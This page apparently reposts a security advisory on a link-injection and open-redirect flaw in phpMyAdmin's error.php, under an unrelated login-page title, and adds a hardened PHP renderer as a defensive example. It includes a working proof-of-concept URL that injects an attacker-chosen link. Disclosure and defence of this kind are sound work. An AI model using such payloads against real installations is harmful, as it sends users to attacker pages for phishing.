Build a login page with PHP and MySQL


PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification

Credits:

Emanuele ’emgent’ Gentili

Marco ‘white_sheep’ Rondini

Alessandro ‘scox’ Scoscia

In error.php, phpMyAdmin permits the caller to insert text together with a restricted set of BBCode-like tags.

With the tag [a@url@page]Click Me[/a], an attacker can insert a link to a page of their choosing and redirect every user who follows it.

Available tags (the HTML each tag maps to was stripped from this copy of the advisory):

'[i]' => '', '[/i]' => '',
'[em]' => '', '[/em]' => '',
'[b]' => '', '[/b]' => '',
'[strong]' => '', '[/strong]' => '',
'[tt]' => '', '[/tt]' => '',
'[code]' => '', '[/code]' => '',
'[kbd]' => '', '[/kbd]' => '',
'[br]' => '',
'[/a]' => '',
'[sup]' => '', '[/sup]' => '',

The link tag is handled by replacing the pattern '/\[a@([^"@]*)@([^]"]*)\]/' with the link markup (the replacement string is truncated in this copy).

POC:

http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.tigersecurity.it%40_self]This%20Is%20a%20Link[%2Fa]
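A hardened renderer for the same tag family, as an added example that is not phpMyAdmin's code: the input is HTML-escaped before any tag is expanded, and the [a@url@target] tag is only honoured for a same-site relative path with a fixed target, so a value arriving in the query string cannot produce an off-site link. The tag-to-HTML mapping and the same-site path rule are assumptions of this example.

```php
<?php
// Added example, not phpMyAdmin's code: a hardened renderer for the same
// restricted BBCode family. The tag map and the same-site rule are assumed.
function render_restricted_bbcode(string $text): string
{
    // Escape first, so raw HTML or quotes in the input are inert before
    // any tag is expanded (htmlspecialchars leaves '[', ']' and '@' alone).
    $out = htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    // Assumed tag-to-HTML mapping for the allowlisted tags.
    $tags = [
        '[i]' => '<i>',           '[/i]' => '</i>',
        '[em]' => '<em>',         '[/em]' => '</em>',
        '[b]' => '<b>',           '[/b]' => '</b>',
        '[strong]' => '<strong>', '[/strong]' => '</strong>',
        '[tt]' => '<tt>',         '[/tt]' => '</tt>',
        '[code]' => '<code>',     '[/code]' => '</code>',
        '[kbd]' => '<kbd>',       '[/kbd]' => '</kbd>',
        '[sup]' => '<sup>',       '[/sup]' => '</sup>',
        '[br]' => '<br />',       '[/a]' => '</a>',
    ];
    $out = strtr($out, $tags);

    // Link tag: honour it only for a same-site relative path and a fixed
    // target, so a query-string value cannot become an off-site redirect.
    return preg_replace_callback(
        '/\[a@([^"@]*)@([^]"]*)\]/',
        function (array $m): string {
            $href   = $m[1];
            $target = $m[2];
            // Must start with a single '/', use a conservative character
            // set, and contain no '//' (protocol-relative) or '/..' segment.
            $safe_href = preg_match('#^/[A-Za-z0-9_./?=&;%-]*$#', $href) === 1
                && strpos($href, '//') === false
                && strpos($href, '/..') === false;
            $safe_target = in_array($target, ['_self', '_blank'], true);
            if (!$safe_href || !$safe_target) {
                // Drop the tag rather than emit an attacker-chosen href;
                // a leftover </a> from [/a] is harmless.
                return '';
            }
            return '<a href="' . $href . '" target="' . $target . '">';
        },
        $out
    );
}
// Constructed inputs: the same-site link is kept, the off-site one is dropped.
echo render_restricted_bbcode('See [a@/index.php@_self]the index[/a]'), "\n";
echo render_restricted_bbcode('[a@http://offsite.example@_self]Click[/a]'), "\n";
```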

OWASP Reference:

http://www.owasp.org/index.php/Unvalidated_Input

Source: https://bianchenghao.cn/60267.html